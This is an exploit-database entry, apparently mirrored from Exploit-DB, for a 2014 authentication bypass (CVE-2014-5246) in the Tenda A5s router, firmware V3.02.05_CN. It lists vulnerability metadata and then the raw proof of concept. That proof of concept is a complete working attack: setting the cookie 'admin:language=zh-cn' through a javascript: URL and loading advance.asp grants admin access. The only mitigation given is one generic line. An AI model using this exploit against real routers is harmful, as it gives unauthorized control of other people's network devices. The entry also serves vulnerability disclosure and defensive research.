header-logo
Suggest Exploit
vendor:
A5s Router
by:
zixian
8,8
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: A5s Router
Affected Version From: V3.02.05_CN
Affected Version To: V3.02.05_CN
Patch Exists: NO
Related CWE: CVE-2014-5246
CPE: h:tenda:a5s_router
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2014

Tenda A5s Router Authentication Bypass Vulnerability

An authentication bypass vulnerability exists in Tenda A5s Router. An attacker can set a cookie with the value 'admin:language=zh-cn' to gain admin access to the router.

Mitigation:

Ensure that authentication is properly implemented and enforced.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------
          Tenda A5s Router Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author      : zixian
Mail        : me@zixian.org
Date        : Aug, 17-2014
 
Vendor      : http://tenda.com.cn/
Link        : http://tenda.com.cn/Catalog/Product/223
Version     : V3.02.05_CN
CVE         : CVE-2014-5246
 
Exploit & p0c
_____________
 
go to
    http://192.168.2.1/
 
then set cookie with javascript
 
    javascript:document.cookie='admin:language=zh-cn'

go to
    http://192.168.2.1/advance.asp

you are the admin!
_____________

Navigation

Suggest Exploit

Services By CQR